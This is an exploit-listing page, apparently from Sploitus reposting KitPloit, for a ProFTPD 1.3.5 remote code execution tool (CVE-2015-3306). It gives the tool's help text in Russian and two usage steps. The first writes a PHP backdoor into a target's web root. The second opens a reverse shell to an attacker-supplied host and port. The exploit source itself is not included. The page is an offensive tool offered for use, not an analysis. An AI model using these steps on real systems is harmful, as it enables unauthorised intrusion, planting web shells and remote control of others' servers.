Sploitus

Exploit for ProFTPD_CVE-2015-3306

kitploit · 2026-08-30

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XM4UD-PROFTPD_CVE-2015-3306
# (m4ud) ProFTPD 1.3.5 RCE эксплойт CVE: 2015-3306!

root@kitploit:~
    
    
    ProFTPd 1.3.5 RCE
    Использование: ProFTPD.py [параметры]
    
    Параметры:
      -h, --help             показать это сообщение и выйти
      -l LHOST, --lhost=LHOST
                             Локальный IP-адрес для обратной оболочки,
      -p LPORT, --lport=LPORT
                             Порт для обратной оболочки,
      -t TARGET, --target=TARGET
                             Уязвимая цель,
      -d DIRECTORY, --dir=DIRECTORY
                             Корневой каталог веб-сервера для загрузки бэкдора, По умолчанию: /var/www/html
      -c COMMAND, --command=COMMAND
                             Системная команда,
      -f FILE, --file=FILE  
                             Имя бэкдора, По умолчанию: shell.php.
                                          
      
    

ШАГ 1 - Записать бэкдор на целевую машину!

root@kitploit:~
    
    
    Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
    

ШАГ 2 - Получить оболочку!!

root@kitploit:~
    
    
    Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242